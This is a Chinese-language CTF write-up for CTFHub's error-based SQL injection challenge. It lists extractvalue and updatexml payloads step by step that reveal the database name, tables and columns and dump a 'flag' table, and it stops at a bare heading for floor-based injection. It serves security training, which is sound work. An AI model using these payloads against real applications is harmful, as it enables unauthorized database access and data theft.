ctfhub技能树之SQL注入报错注入

一，extractvalue报错注入。

1.判断注入类型,场景中仅仅将SQL语句带入查询返回页面正确，没有返回点的时候，需要报错注入，用报错的回显

extractvalue报错注入:0x7e就是~用来区分数据

里面用select语句，不能用union select

concat()函数
1).功能：将多个字符串连接成一个字符串。
2).语法：concat(str1,str2,…)
返回结果为连接参数产生的字符串，如果有任何一个参数为null，则返回值为null。
 

2.查询当前使用的数据库，报错，出现库名 sqli

1 and extractvalue(null,concat(0x7e,(database()),0x7e))

3.

limit 0,1和limit 1,1爆表，我们要的应该是flag

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))

4.爆字段名

1 and extractvalue(null,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),0x7e))

5.爆字段内容

1 and extractvalue(null,concat(0x7e,(select flag from flag limit 0,1),0x7e))

二，updatexml报错注入。

1.爆库

1 and updatexml(1,concat(0x7e,database(),0x7e),1)

2.爆表

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1)，因为报错注入只显示一条记录，所以需要使用limit语句。构造的语句如下所示：

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

3.爆字段名

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='news'limit 0,1),0x7e),1)

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'limit 1,1),0x7e),1)

4.爆字段内容

1 and updatexml(1,concat(0x7e,(select flag from flag limit 0,1),0x7e),1)或者-1 union select updatexml(1, concat(0x7e,( select( group_concat(flag)) from sqli.flag),0x7e),1)

三，floor报错注入